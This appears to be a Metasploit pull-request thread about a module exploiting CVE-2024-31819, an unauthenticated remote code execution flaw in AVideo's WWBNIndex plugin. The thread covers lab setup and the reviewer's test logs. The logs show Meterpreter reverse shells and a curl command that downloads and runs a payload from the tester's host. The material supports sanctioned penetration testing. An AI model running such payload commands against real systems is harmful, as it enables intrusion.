Add Exploit Module for CVE-2024-31819 in AVideo WWBNIndex Plugin

[Chocapikk]

Greetings Metasploit Team,

I've developed an exploit module targeting a recently discovered vulnerability, CVE-2024-31819, in the AVideo platform's WWBNIndex plugin. This critical Remote Code Execution (RCE) vulnerability allows unauthenticated attackers to execute arbitrary code on vulnerable installations of AVideo from v12.4 to v14.2.

Module Details:

• Vulnerability: CVE-2024-31819
• Documentation: Included detailed steps for verification, a breakdown of the exploit's mechanics.

This module aims to provide the Metasploit community with the tools necessary to test their systems against this severe security flaw. I believe it will be a valuable addition to the Metasploit framework, aiding in the ongoing efforts to improve cybersecurity defenses.

I look forward to your feedback and am happy to make any required adjustments to meet the project's standards.

Thank you for considering this contribution.

Best regards,
Chocapikk

[smcintyre-r7]

Thanks for this module!

[jheysel-r7]

Hey @Chocapikk, thanks for the module. Another great exploit making use of PhpFilterChains!

I was wondering if you could please explain how you setup your .env file for your docker setup - specifically the SERVER_NAME (or in the older verison the webSiteRootURL)?

I grabbed the vulnerable version from here and have tried a couple different configurations, however I keep seeing the following message in the docker logs:

Could not reliably determine the server's fully qualified domain name, using 172.20.0.4. Set the 'ServerName' directive globally to suppress this message

When I navigate to the endpoint the AVideo page loads but nothing on the page (javascript / css) loads because it's all getting redirected to localhost. I suspect this is all due to me incorrectly setting SERVER_NAME / webSiteRootURL.

Any help would be appreciated, thank you!

[Chocapikk]

Hey, about the log message it's not supposed to be a problem.
Sorry for the late reply. You can just add a hostname in /etc/hosts on the attacker's machine , and use the same in the config in SERVER_NAME.

But it's not supposed to create any issue for vulnerability testing even with this.

[jheysel-r7]

Hey @Chocapikk - thanks for the response. I wasn't getting a session when testing and without doing much debugging I thought it might have had something to do with that issue I was seeing in the UI - my apologies. It turns out the vulnerable plugin isn't included in the 12.4 Release I downloaded.

I was able to checkout an older branch: WWBN/AVideo#8369 in order to get a vulnerable version to test successfully.

The module works great, thanks for the submission. I left a couple comments which pretty much all stem from the possibility of being able to have a vulnerable version installed without the vulnerable plugin.

Testing

PHP Payload

msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected vulnerable AVideo version: 12.4, with vulnerable plugin WWBNIndex running.
[*] Sending stage (39927 bytes) to 172.16.199.131
[*] Meterpreter session 6 opened (172.16.199.1:4444 -> 172.16.199.131:44440) at 2024-05-15 11:44:59 -0700

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : msfuser-virtual-machine
OS          : Linux msfuser-virtual-machine 6.2.0-35-generic #35~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Oct  6 10:23:26 UTC 2 x86_64
Meterpreter : php/linux
meterpreter > exit

Fetch Payload Linux

msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > run

[*] Command to run on remote host: curl -so /tmp/a http://172.16.199.1:8374/Hn-8qIL46e0vZdQpIHPToA; chmod +x /tmp/a; /tmp/a &
[*] Fetch handler listening on 172.16.199.1:8374
[*] HTTP server started
[*] Adding resource /Hn-8qIL46e0vZdQpIHPToA
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected vulnerable AVideo version: 12.4, with vulnerable plugin WWBNIndex running.
[*] Client 172.16.199.131 requested /Hn-8qIL46e0vZdQpIHPToA
[*] Sending payload to 172.16.199.131 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 172.16.199.131
[*] Meterpreter session 8 opened (172.16.199.1:4444 -> 172.16.199.131:55714) at 2024-05-15 11:46:54 -0700


meterpreter >
meterpreter > getuid
Server username: www-data
sysinfmeterpreter > sysinfo
Computer     : 172.16.199.131
OS           : Ubuntu 22.04 (Linux 6.2.0-35-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

[Chocapikk]

Hey @jheysel-r7 ,

Thanks for checking out my PR and for the helpful feedback! I've made the changes you suggested, and it's all looking good now. Really appreciate your help.

[jheysel-r7]

Anytime @Chocapikk, thanks for making those changes!

I've retested and everything looks great, landing now 👍

msf6 exploit(multi/http/avideo_wwbnindex_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected vulnerable AVideo version: 12.4, with vulnerable plugin WWBNIndex running.
[*] Sending stage (39927 bytes) to 172.16.199.131
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:33702) at 2024-05-21 14:19:17 -0400

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : msfuser-virtual-machine
OS          : Linux msfuser-virtual-machine 6.2.0-35-generic #35~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Oct  6 10:23:26 UTC 2 x86_64
Meterpreter : php/linux
meterpreter >

[jheysel-r7]

Release Notes

Add module for CVE-2024-31819 which exploits an LFI in AVideo which uses PHP Filter Chaining to turn the LFI into unauthenticated RCE.